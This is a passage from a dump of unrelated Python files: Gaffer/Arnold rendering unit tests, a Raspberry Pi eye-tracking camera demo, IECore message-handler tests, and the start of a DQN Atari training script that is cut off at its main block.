s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 0 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
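# The expected data window below follows from the 640x480 resolution:
# left 0.3 * 640 = 192 and right 0.4 * 640 = 256 extra pixels give
# region_min_x = -192 and region_max_x = 639 + 256, while bottom 0.2 * 480 = 96
# and top 0.1 * 480 = 48 extra pixels give region_min_y = -96 and
# region_max_y = 479 + 48.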
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -96 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 47 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions(), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.registerAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
group["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group["in"].addChild( GafferScene.ScenePlug( "in3" ) )
group["in"].addChild( GafferScene.ScenePlug( "in4" ) )
evaluate = GafferScene.EvaluateLightLinks()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
group["in"]["in1"].setInput( attributes["out"] )
group["in"]["in2"].setInput( light1["out"] )
group["in"]["in3"].setInput( light2["out"] )
group["in"]["in4"].setInput( sphere2["out"] )
evaluate["in"].setInput( group["out"] )
render["in"].setInput( evaluate["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light /group/light1" )
# make sure we pass correct data into the renderer
self.assertEqual(
set( render["in"].attributes( "/group/sphere" )["linkedLights"] ),
set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
)
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere, "use_light_group" )
self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
self.assertEqual( doLinking, True )
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( "/group/sphere1" )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere1, "use_light_group" )
self.assertEqual( lightNames, [] )
self.assertEqual( doLinking, False )
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
self.assertRaisesRegexp( RuntimeError, "Render aborted", s["render"]["task"].execute )
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
if __name__ == "__main__":
unittest.main()
|
eye_cam.py
|
#!/usr/bin/python
from __future__ import absolute_import, division, print_function, unicode_literals
""" Example showing what can be left out. ESC to quit"""
import demo
import pi3d
import numpy as np
import picamera
import picamera.array
import threading
import time
import io
from math import cos, sin, radians
SIZE = 64
NBYTES = SIZE * SIZE * 3
threshold = 40 # pixels whose HSV value (i.e. max of R, G, B) is below this are tracked
POS = np.arange(SIZE, dtype=float) # index values used to find the average (centroid) position
npa = np.zeros((SIZE, SIZE, 4), dtype=np.uint8) # array for loading image
npa[:,:,3] = 255 # set alpha 1.0 (effectively)
new_pic = False
# Create a pool of image processors
done = False
lock = threading.Lock()
pool = []
class ImageProcessor(threading.Thread):
def __init__(self):
super(ImageProcessor, self).__init__()
self.stream = io.BytesIO()
self.event = threading.Event()
self.terminated = False
self.start()
def run(self):
# This method runs in a separate thread
global done, npa, new_pic, SIZE, NBYTES
while not self.terminated:
# Wait for an image to be written to the stream
if self.event.wait(1):
try:
if self.stream.tell() >= NBYTES:
self.stream.seek(0)
# python2 doesn't have the getbuffer() method
#bnp = np.fromstring(self.stream.read(NBYTES),
# dtype=np.uint8).reshape(SIZE, SIZE, 3)
bnp = np.array(self.stream.getbuffer(),
dtype=np.uint8).reshape(SIZE, SIZE, 3)
npa[:,:,0:3] = bnp
new_pic = True
except Exception as e:
print(e)
finally:
# Reset the stream and event
self.stream.seek(0)
self.stream.truncate()
self.event.clear()
# Return ourselves to the pool
with lock:
pool.append(self)
def streams():
while not done:
with lock:
if pool:
processor = pool.pop()
else:
processor = None
if processor:
yield processor.stream
processor.event.set()
else:
# When the pool is starved, wait a while for it to refill
time.sleep(0.1)
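# streams() is the generator handed to camera.capture_sequence() below: each
# iteration pops an idle ImageProcessor from the pool, yields its BytesIO for
# the camera to write one frame into, then sets the processor's event so its
# thread converts that frame into npa.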
def start_capture(): # has to run in yet another thread because capture_sequence() blocks
global SIZE, pool
with picamera.PiCamera() as camera:
pool = [ImageProcessor() for i in range(3)]
camera.resolution = (SIZE, SIZE)
camera.framerate = 60
#camera.led = False
time.sleep(2)
camera.shutter_speed = camera.exposure_speed
camera.exposure_mode = 'off'
g = camera.awb_gains
print('g is {}'.format(g))
camera.awb_mode = 'off'
camera.awb_gains = g
camera.capture_sequence(streams(), format='rgb', use_video_port=True)
t = threading.Thread(target=start_capture)
t.start()
while not new_pic:
time.sleep(0.1)
########################################################################
DISPLAY = pi3d.Display.create(x=100, y=100, w=960, h=720)
DW, DH = DISPLAY.width, DISPLAY.height
CAMERA = pi3d.Camera(is_3d=False)
shader = pi3d.Shader("uv_flat")
matsh = pi3d.Shader("mat_flat")
tex = pi3d.Texture(npa)
screen = pi3d.Sprite(w=SIZE * 4, h=SIZE * 4, z=1.0)
screen.set_draw_details(shader, [tex])
target = pi3d.Sprite(w=20, h=20, z=0.9)
target.set_material([1.0, 0.7, 0.0])
target.set_shader(matsh)
# Fetch key presses ----------------------
mykeys = pi3d.Keyboard()
ax, ay, bx, by, cx, cy, dx, dy = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
BA, DA, CD, CB = 0.0, 0.0, 0.0, 0.0
SM = 0.98
nf = 0
tm = time.time()
mode = 0
while DISPLAY.loop_running():
k = mykeys.read()
if k > -1:
if k==27:
mykeys.close()
DISPLAY.destroy()
break
elif k==ord(' '): # space bar
mode = (mode + 1) % 6
elif k==ord('l'):
threshold *= 0.9
elif k==ord('o'):
threshold *= 1.1
if new_pic:
drk = np.zeros((SIZE, SIZE)) # 2D grid fill with 0.0
drk[np.where(npa[:,:,:3].max(axis=2) < threshold)] = 1.0 # change to 1.0 where img is dark
npa[:,:,0] = drk * 255
tot = drk.sum() # total sum for grid
if tot > 0:
x = (drk.sum(axis=0) * POS).sum() / tot # mean of dark pixels
y = (drk.sum(axis=1) * POS).sum() / tot
if mode == 0:
target.position(-DW / 2, -DH / 2, 0.9)
ax = ax * SM + x * (1.0 - SM)
ay = ay * SM + y * (1.0 - SM)
elif mode == 1:
target.position(-DW / 2, DH / 2, 0.9)
bx = bx * SM + x * (1.0 - SM)
by = by * SM + y * (1.0 - SM)
elif mode == 2:
target.position(DW / 2, DH / 2, 0.9)
cx = cx * SM + x * (1.0 - SM)
cy = cy * SM + y * (1.0 - SM)
elif mode == 3:
target.position(DW / 2, -DH / 2, 0.9)
dx = dx * SM + x * (1.0 - SM)
dy = dy * SM + y * (1.0 - SM)
elif mode == 4:
BA = (bx - ax) / (by - ay)
CD = (cx - dx) / (cy - dy)
DA = (dy - ay) / (dx - ax)
CB = (cy - by) / (cx - bx)
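# The four smoothed corner readings (a..d) define the calibration quadrilateral.
# BA and CD are the x-per-y slopes of its left and right edges, DA and CB the
# y-per-x slopes of its bottom and top edges; the else branch below uses them
# to express the tracked point as a fraction of the distance between opposite
# edges and map it onto the display.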
else:
target.position(-DW / 2 + DW * (x - ax - (y - ay) * BA) /
(dx + (y - dy) * CD - ax - (y - ay) * BA),
-DH / 2 + DH * (y - ay - (x - ax) * DA) /
(by + (x - bx) * CB - ay - (x - ax) * DA), 1.0)
if tot > 60.0:
threshold *= 0.99
if tot < 50.0:
threshold *= 1.01
tex.update_ndarray(npa)
new_pic = False
nf += 1
screen.draw()
target.draw()
print(nf / (time.time() - tm))
print(tot, threshold)
# Shut down the processors in an orderly fashion
while pool:
done = True
with lock:
processor = pool.pop()
processor.terminated = True
processor.join()
|
MessageHandler.py
|
##########################################################################
#
# Copyright (c) 2007-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import threading
import time
import weakref
import IECore
class TestMessageHandler( unittest.TestCase ) :
def testAbbreviation( self ) :
self.assertEqual( IECore.Msg, IECore.MessageHandler )
self.assert_( IECore.Msg is IECore.MessageHandler )
def testStack( self ) :
for i in range( 1, 10 ) :
m = IECore.NullMessageHandler()
with m :
self.assertTrue( m.isSame( IECore.MessageHandler.currentHandler() ) )
m1 = IECore.NullMessageHandler()
m2 = IECore.NullMessageHandler()
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( IECore.MessageHandler.getDefaultHandler() ) )
with m1 :
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( m1 ) )
with m2 :
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( m2 ) )
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( m1 ) )
self.assertTrue( IECore.MessageHandler.currentHandler().isSame( IECore.MessageHandler.getDefaultHandler() ) )
def testLevelStringConversion( self ) :
ll = [
(IECore.MessageHandler.Level.Error, "ERROR"),
(IECore.MessageHandler.Level.Warning, "WARNING"),
(IECore.MessageHandler.Level.Info, "INFO"),
(IECore.MessageHandler.Level.Debug, "DEBUG"),
(IECore.MessageHandler.Level.Invalid, "INVALID"),
]
for l, s in ll :
self.assertEqual( IECore.MessageHandler.levelAsString( l ), s )
self.assertEqual( IECore.MessageHandler.stringAsLevel( s ), l )
self.assertEqual( IECore.MessageHandler.stringAsLevel( s.lower() ), l )
def testOutput( self ) :
with IECore.NullMessageHandler() :
IECore.MessageHandler.output( IECore.Msg.Level.Debug, "message handler test", "ignore me" )
IECore.MessageHandler.output( IECore.Msg.Level.Info, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Warning, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Error, "message handler test", "and me" )
IECore.msg( IECore.Msg.Level.Error, "message handler test", "and me" )
def testOStreamHandler( self ) :
IECore.OStreamMessageHandler.cErrHandler()
IECore.OStreamMessageHandler.cOutHandler()
def testCompoundHandler( self ) :
h = IECore.CompoundMessageHandler()
h.addHandler( IECore.OStreamMessageHandler.cErrHandler() )
h.addHandler( IECore.OStreamMessageHandler.cOutHandler() )
h.removeHandler( IECore.OStreamMessageHandler.cErrHandler() )
h.removeHandler( IECore.OStreamMessageHandler.cOutHandler() )
def testLevelFilteredMessageHandler( self ):
with IECore.LevelFilteredMessageHandler( IECore.NullMessageHandler(), IECore.Msg.Level.Info ) :
IECore.MessageHandler.output( IECore.Msg.Level.Debug, "message handler test", "ignore me" )
IECore.MessageHandler.output( IECore.Msg.Level.Info, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Warning, "message handler test", "and me" )
IECore.MessageHandler.output( IECore.Msg.Level.Error, "message handler test", "and me" )
class Derived( IECore.MessageHandler ):
def __init__( self ):
IECore.MessageHandler.__init__( self )
self.lastMessage = IECore.StringData("")
self.lastContext = IECore.StringData("")
self.lastLevel = IECore.IntData(0)
def handle( self, level, context, msg ):
self.lastLevel.value = level
self.lastContext.value = context
self.lastMessage.value = msg
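# A handler subclass only needs to override handle( level, context, msg );
# because MessageHandler implements the context manager protocol, installing
# it is then just ( minimal sketch, mirroring testSubclassing below ) :
#
#   with TestMessageHandler.Derived() as h :
#       IECore.msg( IECore.Msg.Level.Info, "context", "message" )
#   # h.lastMessage.value is now "message"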
def testSubclassing( self ):
myHandler = self.Derived()
with myHandler :
IECore.MessageHandler.output( IECore.Msg.Level.Info, "context", "message" )
self.assertEqual( myHandler.lastLevel.value, IECore.Msg.Level.Info )
self.assertEqual( myHandler.lastContext.value, "context" )
self.assertEqual( myHandler.lastMessage.value, "message" )
def testContextManager( self ) :
currentHandler = IECore.MessageHandler.currentHandler()
myHandler = self.Derived()
with myHandler :
IECore.MessageHandler.output( IECore.Msg.Level.Info, "context", "message" )
self.failUnless( currentHandler.isSame( IECore.MessageHandler.currentHandler() ) )
self.assertEqual( myHandler.lastLevel.value, IECore.Msg.Level.Info )
self.assertEqual( myHandler.lastContext.value, "context" )
self.assertEqual( myHandler.lastMessage.value, "message" )
def testIsRefCounted( self ) :
self.assert_( issubclass( IECore.MessageHandler, IECore.RefCounted ) )
def testDefaultHandler( self ) :
self.failUnless( isinstance( IECore.MessageHandler.currentHandler(), IECore.LevelFilteredMessageHandler ) )
def testSetLogLevel( self ) :
oldLevel = IECore.MessageHandler.currentHandler().getLevel()
if oldLevel==IECore.MessageHandler.Level.Info :
newLevel = IECore.MessageHandler.Level.Warning
else :
newLevel = IECore.MessageHandler.Level.Info
IECore.setLogLevel( newLevel )
self.assertEqual( IECore.MessageHandler.currentHandler().getLevel(), newLevel )
IECore.setLogLevel( oldLevel )
self.assertEqual( IECore.MessageHandler.currentHandler().getLevel(), oldLevel )
def testContextManagerReturnValue( self ) :
mh = self.Derived()
with mh as mh2 :
pass
self.failUnless( mh is mh2 )
def testThreading( self ) :
def f( handler ) :
with handler :
for i in range( 0, 100 ) :
IECore.msg( IECore.Msg.Level.Info, "test", str( i ) )
time.sleep( 0.0001 ) # encourage python to switch threads
handlers = []
threads = []
for i in range( 0, 100 ) :
handler = IECore.CapturingMessageHandler()
thread = threading.Thread( target = f, args = [ handler ] )
threads.append( thread )
handlers.append( handler )
thread.start()
for thread in threads :
thread.join()
for handler in handlers :
self.assertEqual( len( handler.messages ), 100 )
for i, m in enumerate( handler.messages ) :
self.assertEqual( str( i ), m.message )
def testLifetime( self ) :
m = IECore.NullMessageHandler()
w = weakref.ref( m )
with m :
pass
del m
self.assertEqual( w(), None )
if __name__ == "__main__":
unittest.main()
|
dqn_atari.py
|
#!/usr/bin/env python3
import ptan
import argparse
import torch.optim as optim
import torch.multiprocessing as mp
from tensorboardX import SummaryWriter
from lib import dqn_model, common, atari_wrappers
PLAY_STEPS = 4
def make_env(params):
env = atari_wrappers.make_atari(params['env_name'])
env = atari_wrappers.wrap_deepmind(env, frame_stack=True, pytorch_img=True)
return env
def play_func(params, net, cuda, exp_queue):
env = make_env(params)
writer = SummaryWriter(comment="-" + params['run_name'] + "-dqn")
selector = ptan.actions.EpsilonGreedyActionSelector(epsilon=params['epsilon_start'])
epsilon_tracker = common.EpsilonTracker(selector, params)
agent = ptan.agent.DQNAgent(net, selector, cuda=cuda)
exp_source = ptan.experience.ExperienceSourceFirstLast(env, agent, gamma=params['gamma'], steps_count=1)
exp_source_iter = iter(exp_source)
frame_idx = 0
with common.RewardTracker(writer, params['stop_reward']) as reward_tracker:
while True:
frame_idx += 1
exp = next(exp_source_iter)
exp_queue.put(exp)
epsilon_tracker.frame(frame_idx)
new_rewards = exp_source.pop_total_rewards()
if new_rewards:
if reward_tracker.reward(new_rewards[0], frame_idx, selector.epsilon):
break
exp_queue.put(None)
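# play_func is the actor: it runs in a separate process, steps the environment
# with an epsilon-greedy DQN agent, pushes FirstLast transitions into exp_queue
# and finally puts None to signal that the reward target was reached. The main
# process below drains the queue into the replay buffer and does the training.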
if __name__ == "__main__":
